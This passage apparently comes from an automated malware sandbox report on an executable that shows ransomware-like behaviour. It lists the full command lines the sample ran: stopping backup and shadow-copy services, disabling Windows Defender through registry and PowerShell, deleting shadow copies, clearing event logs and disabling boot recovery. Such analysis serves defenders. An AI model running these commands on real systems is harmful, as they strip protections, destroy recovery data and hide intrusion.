wrote to memory of 1696 3536 0e4d44dde522c07d09d9e3086cfae803.exe 125 PID 3536 wrote to memory of 3896 3536 0e4d44dde522c07d09d9e3086cfae803.exe 127 PID 3536 wrote to memory of 3896 3536 0e4d44dde522c07d09d9e3086cfae803.exe 127 PID 3536 wrote to memory of 3912 3536 0e4d44dde522c07d09d9e3086cfae803.exe 129 PID 3536 wrote to memory of 3912 3536 0e4d44dde522c07d09d9e3086cfae803.exe 129 PID 3536 wrote to memory of 4252 3536 0e4d44dde522c07d09d9e3086cfae803.exe 131 PID 3536 wrote to memory of 4252 3536 0e4d44dde522c07d09d9e3086cfae803.exe 131 PID 3536 wrote to memory of 8 3536 0e4d44dde522c07d09d9e3086cfae803.exe 133 PID 3536 wrote to memory of 8 3536 0e4d44dde522c07d09d9e3086cfae803.exe 133 PID 3536 wrote to memory of 1644 3536 0e4d44dde522c07d09d9e3086cfae803.exe 135 PID 3536 wrote to memory of 1644 3536 0e4d44dde522c07d09d9e3086cfae803.exe 135 PID 3536 wrote to memory of 1440 3536 0e4d44dde522c07d09d9e3086cfae803.exe 137 PID 3536 wrote to memory of 1440 3536 0e4d44dde522c07d09d9e3086cfae803.exe 137
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:204
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:4568
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:176
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3836
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:4696
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2248
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:3084
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_196e4" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_196e4" /y3⤵PID:3708
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:4464
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:3860
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:4180
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:2192
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:3872
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:2684
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:4120
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_196e4" start= disabled2⤵
- Launches sc.exe
PID:2112
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3696
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1696
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3896
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3912
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4252
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:8
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1644
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1440
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1500
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:432
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1908
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:4288
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3780
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3508
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:664
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:5076
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:224
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3908
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2224
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3496
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:5080
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:3664
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:5084
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1856
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1912
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:4208
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1396
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1100
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:808
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4936
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4660
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:4056
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4348
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3172
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3868
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1536
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4384
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:4992
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2400
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2188
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3160
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a